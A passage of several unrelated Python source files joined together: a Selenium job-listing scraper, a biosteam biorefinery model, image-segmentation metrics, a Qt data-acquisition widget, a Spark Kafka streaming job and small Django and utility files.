job_ls = self.chrome.find_elements_by_xpath('//div[@class="info-primary"]/h3/a')
# 迭代出职位详情页链接
job_url_ls = [job.get_attribute('href') for job in job_ls]
for url in job_url_ls:
# 遍历详情链接,传入下一个方法
self.job_detail(url)
# 滚动条拖动到浏览器的最下方
self.chrome.execute_script('window.scrollTo(0,document.body.scrollHeight);')
# 声明下一页按钮的对象
next_page = self.chrome.find_element_by_css_selector('a.next')
if 'disable' in next_page.get_attribute('class'):
# class中有disable,说明已是尾页,跳出循环
break
# 否则继续点击下一页按钮
next_page.click()
def __del__(self):
# 到这里表示循环顺利执行完毕
self.chrome.close() # 关闭浏览器1
self.chrome2.close() # 关闭浏览器2
print('>>>>[Well Done]')
if __name__ == '__main__':
bj = BossJob()
bj.run('爬虫')
|
# -*- coding: utf-8 -*-
"""
Created on Sun May 26 11:21:31 2019
@author: yoelr
"""
from biosteam.evaluation import Model, Metric
from biosteam.evaluation.evaluation_tools import triang
import biosteam.biorefineries.lipidcane as lc
import numpy as np
__all__ = ('lipidcane_model', 'lipidcane_model_with_lipidfraction_parameter')
tea = lc.lipidcane_tea
ethanol = lc.system.ethanol.ethanol
biodiesel = lc.system.biodiesel.biodiesel
lipid_cane = lc.system.pretreatment.lipid_cane
etoh_prodcost = [0]
products = (biodiesel, ethanol)
def get_biodiesel_prodcost():
bd, etoh_prodcost[0] = tea.production_cost(products)
return bd
get_etoh_prodcost = lambda: etoh_prodcost[0]
get_FCI = lambda: tea._FCI_cached
etoh_prod = [0]
def get_biodiesel_prod():
bd, etoh_prod[0] = np.array([biodiesel.massnet, ethanol.massnet]) * tea._annual_factor
return bd
get_etoh_prod = lambda: etoh_prod[0]
BT = lc.system.biorefinery.BT
lc_sys = lc.lipidcane_sys
def get_steam():
return sum([i.flow for i in BT.steam_utilities])*18.01528*tea._annual_factor/1000
power_utils = ([i._power_utility for i in lc_sys.units if (i._power_utility and i is not BT)])
excess_electricity = [0]
def get_consumed_electricity():
factor = tea._annual_factor/1000
electricity_generated = -BT._power_utility.rate * factor
consumed_electricity = sum([i.rate for i in power_utils]) * factor
excess_electricity[0] = electricity_generated - consumed_electricity
return consumed_electricity
get_excess_electricity = lambda: excess_electricity[0]
metrics = (Metric('Internal rate of return', lc.lipidcane_tea.solve_IRR),
Metric('Biodiesel production cost', get_biodiesel_prodcost, 'USD/yr'),
Metric('Ethanol production cost', get_etoh_prodcost, 'USD/yr'),
Metric('Fixed capital investment', get_FCI, 'USD'),
Metric('Biodiesel production', get_biodiesel_prod, 'kg/hr'),
Metric('Ethanol production', get_etoh_prod, 'kg/hr'),
Metric('Steam', get_steam, 'MT/yr'),
Metric('Consumed electricity', get_consumed_electricity, 'MWhr/yr'),
Metric('Excess electricity', get_excess_electricity, 'MWhr/yr'))
lipidcane_model = Model(lc_sys, metrics)
lipidcane_model.load_default_parameters(lipid_cane)
param = lipidcane_model.parameter
# Lipid extraction rate
Mill = lc.system.pretreatment.U201
Mill_split = Mill.split
Lipid_index = Mill.outs[0].index('Lipid')
@param(element=Mill,
distribution=triang(Mill_split[Lipid_index]),
kind='coupled')
def set_lipid_extraction_rate(lipid_extraction_rate):
Mill_split[Lipid_index] = lipid_extraction_rate
# Transesterification efficiency (both tanks)
R401 = lc.system.biodiesel.R401
@param(element=R401, distribution=triang(R401.efficiency), kind='coupled')
def set_transesterification_401_efficiency(efficiency):
R401.efficiency = efficiency
R402 = lc.system.biodiesel.R402
@param(element=R402, distribution=triang(R402.efficiency), kind='coupled')
def set_transesterification_402_efficiency(efficiency):
R402.efficiency = efficiency
# Fermentation efficiency
fermentation = lc.system.ethanol.R301
@param(element=fermentation, distribution=triang(fermentation.efficiency),
kind='coupled')
def set_fermentation_efficiency(efficiency):
fermentation.efficiency= efficiency
# Boiler efficiency
BT = lc.system.biorefinery.BT
@param(element=BT, distribution=triang(BT.boiler_efficiency))
def set_boiler_efficiency(boiler_efficiency):
BT.boiler_efficiency = boiler_efficiency
# Turbogenerator efficiency
@param(element=BT, distribution=triang(BT.turbogenerator_efficiency))
def set_turbogenerator_efficiency(turbo_generator_efficiency):
BT.turbo_generator_efficiency = turbo_generator_efficiency
# RVF separation
rvf = lc.system.pretreatment.C202
@param(element=rvf, distribution=triang(rvf.split['Lignin']),
kind='coupled')
def set_rvf_solids_retention(solids_retention):
rvf.split['Lignin', 'CaO', 'Ash', 'Cellulose', 'Hemicellulose'] = solids_retention
lipidcane_model_with_lipidfraction_parameter = lipidcane_model.copy()
lipidcane_model_with_lipidfraction_parameter.parameter(lc.set_lipid_fraction,
element=lipid_cane,
name='Lipid fraction',
distribution=triang(0.05))
|
"""PurbeurreConfig
"""
from django.apps import AppConfig
class PurbeurreConfig(AppConfig):
"""PurbeurreConfig for purbeurre app
Args:
AppConfig ([type]): [description]
"""
name = 'purbeurre'
|
"""
AA, February 2021
Assignment 3: Contagem dos Itens Mais Frequentes
Author: Ana Sofia Fernandes, 88739
"""
from Reader.File_reader import File_reader
from collections import Counter
import time
from tabulate import tabulate
##Class that acts as an exact counter and counts the occurences of each char in file
class Exact_counter:
def __init__(self, file_to_read):
self.char_counting_dict = {}
self.file_reader = File_reader(file_to_read)
self.execution_time = 0
def count_chars(self):
"""
Counts the occurence of each char in a given file and saves it in
a dictionary. The couting is made with an exact counter.
"""
self.file_reader.read_file()
chars = self.file_reader.get_final_chars()
start_time = time.time()
for w in chars:
if w not in self.char_counting_dict:
self.char_counting_dict[w] = 1
else:
self.char_counting_dict[w] += 1
self.execution_time = time.time() - start_time
self.char_counting_dict = {k: v for k, v in sorted(self.char_counting_dict.items(), key=lambda item: item[1], reverse=True)}
def write_final_counting(self, output_file):
"""
Write in file the final counting for exact counter, in descending order
"""
with open(output_file,"w") as file:
file.write("\nNumber of chars counted: "+ str(len(self.char_counting_dict.keys()))+"\n")
file.write("\nFinal char counting:\n")
for char in self.char_counting_dict:
file.write("\n"+char+" -> "+str(self.char_counting_dict[char]))
def write_top_20_chars(self, output_file):
"""
Write in file the top 20 chars
"""
high = self.get_top_20_chars()
headers = ["Char", "Couting"]
rows=[]
with open(output_file,"w") as output:
output.write("--- Top 20 chars - exact counter: \n\n" )
for i in high:
#output.write("\n"+str(i[0])+" -> "+str(i[1]))
rows.append([i[0],i[1]])
output.write(tabulate(rows,headers=headers))
def get_final_counting(self):
"""
Getter for the dictionary with the final counting
"""
return self.char_counting_dict
def get_top_20_chars(self):
"""
Getter for the most 20 counted chars
"""
k = Counter(self.char_counting_dict)
return k.most_common(20)
def get_total_counted_chars(self):
"""
Getter for all chars counted by exact counter
"""
return sum(self.char_counting_dict.values())
def get_execution_time(self):
"""
Getter for execution time
"""
return round(self.execution_time,3) |
import warnings
from PySide2.QtCore import Qt, QObject, Slot, Signal, Property
from PySide2.QtWidgets import QWidget, QVBoxLayout, QGridLayout, QButtonGroup, QCheckBox
import pyqtgraph as pg
import numpy as np
import topside as top
def trim_earlier(array, t):
"""
Return the portion of an array falling after a reference value.
Parameters
----------
array: list or numpy.ndarray
The array to trim. Must be monotonically increasing.
t: number
The reference value used for trimming the array.
Returns an array corresponding to the portion of `array` after the
first value greater than or equal to `t`.
For example:
trim_earlier([1, 3, 5], 2) == [3, 5]
trim_earlier([4, 6, 8], 6) == [6, 8]
trim_earlier([10, 20, 30], 40) == []
"""
i = 0
while i < len(array) and array[i] < t:
i += 1
return array[i:]
class DAQBridge(QObject):
channelAdded = Signal(str)
channelRemoved = Signal(str)
dataUpdated = Signal(str, np.ndarray, np.ndarray) # channel name, time vals, data vals
def __init__(self, plumbing_bridge):
QObject.__init__(self)
plumbing_bridge.dataUpdated.connect(self.update)
plumbing_bridge.engineLoaded.connect(self.clear)
self.data_values = {} # {channel_name: np.ndarray}
self.times = np.array([])
self.window_size_s = 10 # TODO(jacob): Add a UI field for this.
@Slot()
def clear(self):
channels = list(self.data_values.keys())
for channel in channels:
self.removeChannel(channel)
self.times = np.array([])
@Slot(str)
def addChannel(self, channel_name):
if channel_name in self.data_values:
# This should never happen, but we'll put a warning on it
# just in case.
warnings.warn('attempted to add a duplicate channel to DAQ')
return
self.data_values[channel_name] = np.array([])
self.channelAdded.emit(channel_name)
@Slot(str)
def removeChannel(self, channel_name):
del self.data_values[channel_name]
self.channelRemoved.emit(channel_name)
@Slot(dict, np.ndarray)
def update(self, datapoints, times):
"""
Update the tracked data channels with new data.
This function will automatically trim the existing data to
remain within the window size. For example, if the window size
is 10s, we have data from 12s to 22s, and we get new data from
22s to 25s, we will end up with data from 15s to 25s after
calling `update`.
Parameters
----------
datapoints: dict
`datapoints` is a dict of the form `{channel: values}`,
where `channel` is a string corresponding to a tracked
channel name and `values` is a NumPy array of new data
values.
times: np.ndarray
`times` is an array of the form `[t1, t2, t3]`. It is
expected to be the same length as each `values` list. For
any channel in `datapoints`, `values[i]` is the value of the
channel at time `times[i]`.
"""
if len(times) == 0:
return
if len(self.times) > 0 and top.micros_to_s(times[0]) < self.times[-1]:
# We stepped back in time, clear all existing time values.
# We don't need to clear data_values since they'll
# automatically be trimmed to the relevant data later on.
self.times = np.array([])
trim_time = top.micros_to_s(times[-1]) - self.window_size_s
appended = np.append(self.times, top.micros_to_s(times))
self.times = trim_earlier(appended, trim_time)
for channel, values in datapoints.items():
if channel in self.data_values:
extended = np.append(self.data_values[channel], values)
num_vals = min(len(self.times), len(extended))
# TODO(jacob): We trim the arrays here to make them the
# same length, but it could be nicer to front-pad with
# NaNs so that the time axis is the same across all of
# the plots. PyQtGraph fixed a bug related to this
# recently, but the commit hasn't made it into a new
# release yet.
self.data_values[channel] = extended[-num_vals:]
times_to_plot = self.times[-num_vals:]
self.dataUpdated.emit(channel, times_to_plot, self.data_values[channel])
class DAQLayout(QWidget):
def __init__(self):
QWidget.__init__(self)
self.setLayout(QVBoxLayout())
self.plot_items = {} # {channel_name: PlotItem}
self.plot_curves = {} # {channel_name: PlotDataItem}
self.next_row = 0
self.pen = pg.mkPen(color='g', width=1)
self.graphs = pg.GraphicsLayoutWidget()
self.graphs.ci.setBorder('w', width=2)
self.layout().addWidget(self.graphs)
self.channel_selector = ChannelSelector()
self.layout().addWidget(self.channel_selector)
@Slot()
def clear(self):
channels = list(self.plot_items.keys())
for channel in channels:
self.removeChannel(channel)
@Slot(str)
def addChannel(self, channel_name):
if channel_name in self.plot_items:
warnings.warn('attempted to add a duplicate channel to DAQ')
return
plot = self.graphs.addPlot(row=self.next_row, col=0, title=channel_name)
plot.setLimits(minYRange=2)
plot.showGrid(x=True, y=True)
self.plot_items[channel_name] = plot
self.plot_curves[channel_name] = plot.plot(pen=self.pen)
# NOTE(jacob): PyQtGraph doesn't adjust row numbers if an item
# is deleted from the layout, so we can't simply assume that the
# next row available is (number of plots + 1). Fortunately,
# the actual values of the assigned row numbers don't seem to
# matter, so we just need to make sure the "next row" is higher
# than all of the others so far.
self.next_row += 1
@Slot(str)
def removeChannel(self, channel_name):
if channel_name in self.plot_items:
item = self.plot_items[channel_name]
# NOTE(jacob): For some reason, PyQtGraph doesn't properly
# delete the border geometry for plot items when removeItem is
# called on a GraphicsLayout (or GraphicsLayoutWidget), so we
# need to explicitly delete it ourselves or we get weird lines
# left on the screen. I'm considering submitting a PR to fix
# this, if I can confirm that it's actually a bug.
border = self.graphs.ci.itemBorders[item]
self.graphs.ci.scene().removeItem(border)
self.graphs.removeItem(item)
item.deleteLater()
del self.plot_items[channel_name]
del self.plot_curves[channel_name]
@Slot(str, np.ndarray, np.ndarray)
def updateData(self, channel_name, times, data_vals):
curve = self.plot_curves[channel_name]
curve.setData(times, data_vals)
class ChannelSelector(QWidget):
channelSelected = Signal(str)
channelDeselected = Signal(str)
def __init__(self):
QWidget.__init__(self)
self.setLayout(QGridLayout())
self.control_group = QButtonGroup()
self.control_group.setExclusive(False)
self.control_group.idToggled.connect(self.notifyChannel)
self.ids_to_channels = {} # {id: channel_name (str)}
self.checkboxes = {} # {channel_name: QCheckBox}
self.next_id = 0
# TODO(jacob): 4 columns is mostly an arbitrary choice; 5 seemed
# too crowded, 3 seemed too empty. Ideally we'd change this
# dynamically based on the column width.
self.num_cols = 4
def add_checkbox(self, channel_name):
if channel_name in self.checkboxes:
warnings.warn('attempted to add a duplicate checkbox to the DAQ channel selector')
return
checkbox = QCheckBox(channel_name)
self.checkboxes[channel_name] = checkbox
num_widgets = len(self.checkboxes)
row = (num_widgets - 1) // self.num_cols
col = (num_widgets - 1) % self.num_cols
self.layout().addWidget(checkbox, row, col)
self.control_group.addButton(checkbox, self.next_id)
self.ids_to_channels[self.next_id] = channel_name
self.next_id += 1
def clear_checkboxes(self):
for checkbox in self.checkboxes.values():
self.control_group.removeButton(checkbox)
self.layout().removeWidget(checkbox)
checkbox.deleteLater()
self.checkboxes = {}
self.ids_to_channels = {}
@Slot(top.PlumbingEngine)
def updateNodeList(self, plumb):
self.clear_checkboxes()
for node in plumb.nodes(data=False):
self.add_checkbox(node)
@Slot(int)
def notifyChannel(self, checkbox_id, is_checked):
channel = self.ids_to_channels[checkbox_id]
if is_checked:
self.channelSelected.emit(channel)
else:
self.channelDeselected.emit(channel)
def make_daq_widget(daq_bridge, plumbing_bridge):
layout = DAQLayout()
daq_bridge.channelAdded.connect(layout.addChannel)
daq_bridge.channelRemoved.connect(layout.removeChannel)
daq_bridge.dataUpdated.connect(layout.updateData)
layout.channel_selector.channelSelected.connect(daq_bridge.addChannel)
layout.channel_selector.channelDeselected.connect(daq_bridge.removeChannel)
plumbing_bridge.engineLoaded.connect(layout.channel_selector.updateNodeList)
return layout
|
def print_dictionary_values(dic):
for some_key, some_value in dic.iteritems():
print "My" + " " + some_key + " " + "is" + " " + str(some_value)
print print_dictionary_values({
"name": "Tom",
"age": 30,
"country of birth": "USA",
"favorite language": "English"
}
)
|
from typing import Callable, Dict, List, Tuple, Union
import numpy as np
from .binary_metrics import get_stats, iou_score
__all__ = [
"pairwise_pixel_stats",
"pairwise_object_stats",
"panoptic_quality",
"average_precision",
"aggregated_jaccard_index",
"dice2",
"iou_multiclass",
"dice_multiclass",
"f1score_multiclass",
"accuracy_multiclass",
"sensitivity_multiclass",
"specificity_multiclass",
]
def pairwise_pixel_stats(
true: np.ndarray,
pred: np.ndarray,
num_classes: int = None,
metric_func: Callable = None,
) -> Union[List[np.ndarray], None]:
"""Compute the # of TP, FP, FN pixels for each object in a labelled/semantic mask.
Optionally a binary metric can be computed instead of the satistics.
Atleast 2x faster than computing with `np.histogram2d`.
Parameters
----------
true : np.ndarray
Ground truth (semantic or labelled mask). Shape (H, W).
pred : np.ndarray
Predicted (semantic or labelled mask). Shape (H, W).
num_classes : int, optional
Number of classes in the dataset. If None, stats are computed for instances.
If not None stats are computed for classes i.e. semantic segmentation masks.
metric_func : Callable, optional
A binary metric function. e.g. `iou_score` or `dice`.
Returns
-------
List[np.ndarray, ...] or None:
A List of 2D arrays (i, j) where i corresponds to a ground
truth label and j corresponds to a predicted label. Each value
of the matrix is the computed statistic or metric at pos (i, j).
By default. returns the tp, fp, and fn matrices.
If stats computed for instances:
Shape: (n_labels_gt, n_labels_pred). Dtype. float64.
If stats computed for classes:
Shape: (num_classes, num_classes). Dtype. float64.
"""
if num_classes is not None:
true_labels = list(range(num_classes))
pred_labels = list(range(num_classes))
else:
true_labels = list(np.unique(true))[1:]
pred_labels = list(np.unique(pred))[1:]
true_objects = {}
for t in true_labels:
true_obj = np.array(true == t, np.uint8)
true_objects[t] = true_obj
pred_objects = {}
for p in pred_labels:
pred_obj = np.array(pred == p, np.uint8)
pred_objects[p] = pred_obj
# array dims
i = len(true_labels)
j = len(pred_labels)
# init return list
ret = []
if i > 0 and j > 0:
ret.append(np.zeros((i, j), dtype=np.float64))
if metric_func is None:
ret.append(np.zeros((i, j), dtype=np.float64))
ret.append(np.zeros((i, j), dtype=np.float64))
for true_label in true_labels:
true_obj = true_objects[true_label]
overlap = pred[true_obj > 0]
overlap_label = np.unique(overlap)
for pred_label in overlap_label:
# ignore bg and empty preds in instance mode
if pred_label == 0 and num_classes is None:
continue
pred_obj = pred_objects[pred_label]
tp, fp, fn = get_stats(true_obj, pred_obj)
if num_classes is None:
ix = true_label - 1
jx = pred_label - 1
else:
ix = true_label
jx = pred_label
# compute a metric or add stats
if metric_func is not None:
ret[0][ix, jx] = metric_func(tp, fp, fn)
else:
ret[0][ix, jx] = tp.sum()
ret[1][ix, jx] = fp.sum()
ret[2][ix, jx] = fn.sum()
return ret
def pairwise_object_stats(
matches: np.ndarray, sum_reduce: bool = True
) -> Union[Tuple[int, int, int], Tuple[List[bool]]]:
"""Compute the TP, FP, FN objects from a boolean contigency table.
Parameters
----------
matches : np.ndarray
A pairwise boolean matrix where True values at pos (i, j)
indicate correctly detected objects for the corresponding
labels i and j. Shape: (n_labels_gt, n_labels_pred).
sum_reduce : bool, default=True
Reduce the boolean indice arrays by summing to get the correct
number of TP, FP, and FN objects.
Returns
-------
Tuple[int, int, int]:
The number of TP objects, FP objects, and FN objects in
a labelled mask.
"""
true_hits = matches.sum(axis=0)
pred_hits = matches.sum(axis=1)
tp_objects = pred_hits >= 1 # indices of correctly predicted objects
fp_objects = pred_hits == 0 # indices of missed objects in prediciton
fn_objects = true_hits == 0 # indices of extra objects in prediction
if sum_reduce:
tp_objects = tp_objects.sum()
fp_objects = fp_objects.sum()
fn_objects = fn_objects.sum()
return tp_objects, fp_objects, fn_objects
def panoptic_quality(
true: np.ndarray, pred: np.ndarray, thresh: float = 0.5, eps: float = 1e-8
) -> Dict[str, float]:
"""Compute the panoptic quality of a lebelled mask.
Parameters
----------
true : np.ndarray
Ground truth (labelled mask). Shape (H, W).
pred : np.ndarray
Predicted (labelled mask). Shape (H, W).
thresh : float, default=0.5
Threshold for the iou to include the prediction as TP
eps : float, default=1e-8:
Epsilon to avoid zero div errors.
Returns
-------
Dict[str, float]:
Dictionary containing the detection quality (dq), segmentation
quality (sq) and panoptic quality (pq) values.
"""
iou = pairwise_pixel_stats(true, pred, metric_func=iou_score)
res = {"pq": 0.0, "sq": 0.0, "dq": 0.0}
if iou:
iou = iou[0]
matches = iou > thresh
tp_objects, fp_objects, fn_objects = pairwise_object_stats(matches)
dq = tp_objects / (tp_objects + 0.5 * fp_objects + 0.5 * fn_objects + eps)
sq = iou[matches].sum() / (tp_objects + eps)
pq = dq * sq
res["pq"] = pq
res["sq"] = sq
res["dq"] = dq
return res
def average_precision(
true: np.ndarray, pred: np.ndarray, thresh: float = 0.5, eps: float = 1e-8
) -> float:
"""Compute the average precision of a labelled mask.
Parameters
----------
true : np.ndarray
Ground truth (labelled mask). Shape (H, W).
pred : np.ndarray
Predicted (labelled mask). Shape (H, W).
thresh : float, default=0.5
Threshold for the iou to include the prediction as TP
eps : float, default=1e-8:
Epsilon to avoid zero div errors.
Returns
-------
float:
The computed precision.
"""
iou = pairwise_pixel_stats(pred, true, metric_func=iou_score)
ap = 0.0
if iou:
iou = iou[0]
matches = iou > thresh
tp_objects, fp_objects, _ = pairwise_object_stats(matches)
ap = tp_objects / (tp_objects + fp_objects + eps)
return ap
def dice2(true: np.ndarray, pred: np.ndarray, eps: float = 1e-8) -> float:
"""Compute the DICE2 metric for a labelled mask.
Parameters
----------
true : np.ndarray
Ground truth (labelled mask). Shape (H, W).
pred : np.ndarray
Predicted (labelled mask). Shape (H, W).
eps : float, default=1e-8:
Epsilon to avoid zero div errors.
Returns
-------
float:
The computed dice2 metric.
"""
dice2 = 0.0
stats = pairwise_pixel_stats(true, pred)
if stats:
tp, fp, fn = stats
numerator = 2 * tp[tp > 0].sum()
denominator = numerator + fp[fp > 0].sum() + fn[fn > 0].sum() + eps
dice2 = numerator / denominator
return dice2
def aggregated_jaccard_index(
true: np.ndarray, pred: np.ndarray, thresh: float = 0.5, eps: float = 1e-8
) -> float:
"""Compute the aggregated jaccard index (AJI) for a labelled mask.
Parameters
----------
true : np.ndarray
Ground truth (labelled mask). Shape (H, W).
pred : np.ndarray
Predicted (labelled mask). Shape (H, W).
thresh : float, default=0.5
Threshold for the iou to include the prediction as TP
eps : float, default=1e-8:
Epsilon to avoid zero div errors.
Returns
-------
float:
The computed aji.
"""
aji = 0.0
stats = pairwise_pixel_stats(true, pred)
if stats:
tp, fp, fn = stats
inter = tp
union = tp + fp + fn
# Get the number of pixels from the matched objects
matches = inter == np.amax(inter, axis=1, keepdims=True, initial=1e-8)
inter = inter[matches].sum()
union = union[matches].sum()
# Get the num of pixels from the missed objects
_, fp_objects, fn_objects = pairwise_object_stats(matches, sum_reduce=False)
unpaired_true_labels = np.nonzero(fp_objects)[0] + 1
unpaired_pred_labels = np.nonzero(fn_objects)[0] + 1
for true_id in unpaired_true_labels:
union += (true == true_id).sum()
for pred_id in unpaired_pred_labels:
union += (pred == pred_id).sum()
# compute aji
aji = inter / (union + eps)
return aji
def _absent_inds(true: np.ndarray, pred: np.ndarray, num_classes: int) -> np.ndarray:
"""Get the class indices that are not present in either `true` or `pred`."""
t = np.unique(true)
p = np.unique(pred)
not_pres = np.setdiff1d(np.arange(num_classes), np.union1d(t, p))
return not_pres
def iou_multiclass(
true: np.ndarray,
pred: np.ndarray,
num_classes: int,
eps: float = 1e-8,
clamp_absent: bool = True,
) -> np.ndarray:
"""Compute multi-class intersection over union for semantic segmentation masks.
Parameters
----------
true : np.ndarray
Ground truth semantic mask. Shape (H, W).
pred : np.ndarray
Predicted semantic mask. Shape (H, W).
num_classes : int
Number of classes in the training dataset.
eps : float, default=1e-8:
Epsilon to avoid zero div errors.
clamp_absent : bool, default=True
If a class is not present in either true or pred, the value of that ix
in the result array will be clamped to -1.0.
Returns
-------
np.ndarray:
Per class IoU-metrics. Shape: (num_classes,).
"""
tp, fp, fn = pairwise_pixel_stats(true, pred, num_classes=num_classes)
tp = tp.diagonal()
fp = fp.diagonal()
fn = fn.diagonal()
iou = tp / (tp + fp + fn + eps)
if clamp_absent:
not_pres = _absent_inds(true, pred, num_classes)
iou[not_pres] = -1.0
return iou
def accuracy_multiclass(
true: np.ndarray,
pred: np.ndarray,
num_classes: int,
eps: float = 1e-8,
clamp_absent: bool = True,
) -> np.ndarray:
"""Compute multi-class accuracy for semantic segmentation masks.
Parameters
----------
true : np.ndarray
Ground truth semantic mask. Shape (H, W).
pred : np.ndarray
Predicted semantic mask. Shape (H, W).
num_classes : int
Number of classes in the training dataset.
eps : float, default=1e-8:
Epsilon to avoid zero div errors.
clamp_absent: bool = True
If a class is not present in either true or pred, the value of that ix
in the result array will be clamped to -1.0.
Returns
-------
np.ndarray:
Per class accuracy-metrics. Shape: (num_classes,).
"""
tp, fp, fn = pairwise_pixel_stats(true, pred, num_classes=num_classes)
tp = tp.diagonal()
fp = fp.diagonal()
fn = fn.diagonal()
tn = np.prod(true.shape) - (tp + fn + fp)
accuracy = (tp + tn) / (tp + fp + fn + tn + eps)
if clamp_absent:
not_pres = _absent_inds(true, pred, num_classes)
accuracy[not_pres] = -1.0
return accuracy
def f1score_multiclass(
true: np.ndarray,
pred: np.ndarray,
num_classes: int,
eps: float = 1e-8,
clamp_absent: bool = True,
) -> np.ndarray:
"""Compute multi-class f1-score for semantic segmentation masks.
Parameters
----------
true : np.ndarray
Ground truth semantic mask. Shape (H, W).
pred : np.ndarray
Predicted semantic mask. Shape (H, W).
num_classes : int
Number of classes in the training dataset.
eps : float, default=1e-8:
Epsilon to avoid zero div errors.
clamp_absent: bool = True
If a class is not present in either true or pred, the value of that ix
in the result array will be clamped to -1.0.
Returns
-------
np.ndarray:
Per class f1score-metrics. Shape: (num_classes,).
"""
tp, fp, fn = pairwise_pixel_stats(true, pred, num_classes=num_classes)
tp = tp.diagonal()
fp = fp.diagonal()
fn = fn.diagonal()
f1 = tp / (0.5 * fp + 0.5 * fn + tp + eps)
if clamp_absent:
not_pres = _absent_inds(true, pred, num_classes)
f1[not_pres] = -1.0
return f1
def dice_multiclass(
true: np.ndarray,
pred: np.ndarray,
num_classes: int,
eps: float = 1e-8,
clamp_absent: bool = True,
) -> np.ndarray:
"""Compute multi-class dice for semantic segmentation masks.
Parameters
----------
true : np.ndarray
Ground truth semantic mask. Shape (H, W).
pred : np.ndarray
Predicted semantic mask. Shape (H, W).
num_classes : int
Number of classes in the training dataset.
eps : float, default=1e-8:
Epsilon to avoid zero div errors.
clamp_absent: bool = True
If a class is not present in either true or pred, the value of that ix
in the result array will be clamped to -1.0.
Returns
-------
np.ndarray:
Per class dice-metrics. Shape: (num_classes,).
"""
tp, fp, fn = pairwise_pixel_stats(true, pred, num_classes=num_classes)
tp = tp.diagonal()
fp = fp.diagonal()
fn = fn.diagonal()
dice = 2 * tp / (2 * tp + fp + fn + eps)
if clamp_absent:
not_pres = _absent_inds(true, pred, num_classes)
dice[not_pres] = -1.0
return dice
def sensitivity_multiclass(
true: np.ndarray,
pred: np.ndarray,
num_classes: int,
eps: float = 1e-8,
clamp_absent: bool = True,
) -> np.ndarray:
"""Compute multi-class sensitivity for semantic segmentation masks.
Parameters
----------
true : np.ndarray
Ground truth semantic mask. Shape (H, W).
pred : np.ndarray
Predicted semantic mask. Shape (H, W).
num_classes : int
Number of classes in the training dataset.
eps : float, default=1e-8:
Epsilon to avoid zero div errors.
clamp_absent: bool = True
If a class is not present in either true or pred, the value of that ix
in the result array will be clamped to -1.0.
Returns
-------
np.ndarray:
Per class sensitivity-metrics. Shape: (num_classes,).
"""
tp, fp, fn = pairwise_pixel_stats(true, pred, num_classes=num_classes)
tp = tp.diagonal()
fp = fp.diagonal()
fn = fn.diagonal()
sensitivity = tp / (tp + fn + eps)
if clamp_absent:
not_pres = _absent_inds(true, pred, num_classes)
sensitivity[not_pres] = -1.0
return sensitivity
def specificity_multiclass(
true: np.ndarray,
pred: np.ndarray,
num_classes: int,
eps: float = 1e-8,
clamp_absent: bool = True,
) -> np.ndarray:
"""Compute multi-class specificity for semantic segmentation masks.
Parameters
----------
true : np.ndarray
Ground truth semantic mask. Shape (H, W).
pred : np.ndarray
Predicted semantic mask. Shape (H, W).
num_classes : int
Number of classes in the training dataset.
eps : float, default=1e-8:
Epsilon to avoid zero div errors.
clamp_absent: bool = True
If a class is not present in either true or pred, the value of that ix
in the result array will be clamped to -1.0.
Returns
-------
np.ndarray:
Per class specificity-metrics. Shape: (num_classes,).
"""
tp, fp, fn = pairwise_pixel_stats(true, pred, num_classes=num_classes)
tp = tp.diagonal()
fp = fp.diagonal()
fn = fn.diagonal()
specificity = tp / (tp + fp + eps)
if clamp_absent:
not_pres = _absent_inds(true, pred, num_classes)
specificity[not_pres] = -1.0
return specificity
|
import logging
import json
from pyspark.sql import SparkSession
from pyspark.sql.types import *
import pyspark.sql.functions as psf
# TODO Create a schema for incoming resources
schema = StructType([
StructField("crime_id", StringType(), False),
StructField("original_crime_type_name", StringType(), True),
StructField("report_date", StringType(), True),
StructField("call_date", StringType(), True),
StructField("offense_date", StringType(), True),
StructField("call_time", StringType(), True),
StructField("call_date_time", StringType(), True),
StructField("disposition", StringType(), True),
StructField("address", StringType(), True),
StructField("city", StringType(), True),
StructField("state", StringType(), True),
StructField("agency_id", StringType(), True),
StructField("address_type", StringType(), True),
StructField("common_location", StringType(), True)
])
def run_spark_job(spark):
# TODO Create Spark Configuration
# Create Spark configurations with max offset of 200 per trigger
# set up correct bootstrap server and port
df = spark \
.readStream \
.format("kafka")\
.option("subscribe", "nd.project.crimestats")\
.option("kafka.bootstrap.servers", "localhost:9092")\
.option("startingOffsets", "earliest") \
.option("maxOffsetsPerTrigger", 200) \
.option("maxRatePerPartition", 100) \
.option("stopGracefullyOnShutdown", "true") \
.load()
# Show schema for the incoming resources for checks
df.printSchema()
# TODO extract the correct column from the kafka input resources
# Take only value and convert it to String
kafka_df = df.selectExpr("CAST(value AS STRING)")
service_table = kafka_df\
.select(psf.from_json(psf.col('value'), schema).alias("DF"))\
.select("DF.*")
# example call_date_time string: '2018-12-26T13:32:00.000'
with_timestamp = service_table.withColumn('datetime', psf.to_timestamp(service_table.call_date_time, "yyyy-MM-dd'T'HH:mm:ss.SSS"))
# TODO select original_crime_type_name and disposition
distinct_table = with_timestamp\
.select("original_crime_type_name","disposition", "datetime") \
.withWatermark("datetime", "60 minutes")
# TODO get the right radio code json path
radio_code_json_filepath = "/home/workspace/radio_code.json"
radio_code_df = spark.read.json(radio_code_json_filepath, multiLine=True)
# clean up your data so that the column names match on radio_code_df and agg_df
# we will want to join on the disposition code
# TODO rename disposition_code column to disposition
radio_code_df = radio_code_df.withColumnRenamed("disposition_code", "disposition")
#print(radio_code_df.show())
# TODO join on disposition column
join_query = distinct_table.join(radio_code_df,"disposition")
count_query = join_query \
.groupBy("original_crime_type_name", psf.window("datetime", "60 minutes")) \
.count() \
.sort("original_crime_type_name", "window")
query = count_query.writeStream \
.format("console") \
.queryName("pdb") \
.outputMode('Complete') \
.trigger(processingTime="30 seconds") \
.option("truncate", "false") \
.start()
#.option("checkpointLocation", "/tmp/chkpnt") \
# TODO attach a ProgressReporter
query.awaitTermination()
if __name__ == "__main__":
logger = logging.getLogger(__name__)
# TODO Create Spark in Standalone mode
spark = SparkSession \
.builder \
.master("local[*]") \
.config("spark.ui.port", 3000) \
.appName("KafkaSparkStructuredStreaming") \
.getOrCreate()
logger.info("Spark started")
spark.sparkContext.setLogLevel("WARN")
run_spark_job(spark)
spark.stop()
|
from django.urls import path, re_path
from . import views
urlpatterns = [
#quiz and question api
path('api/quiz_question/<int:pk>/', views.QuizQuestionDetail.as_view()),
path('api/quiz_result/<int:quiz_id>/', views.QuizResult.as_view()),
path('api/full_quiz/<int:pk>/', views.FullQuizDetail.as_view()),
path('api/quiz_category/<cate>/', views.QuizCategory.as_view()),
path('api/answered_quiz/', views.UserAnswered.as_view()),
path('api/quiz_status_update/<int:pk>/', views.UpdateStatusQuiz.as_view()),
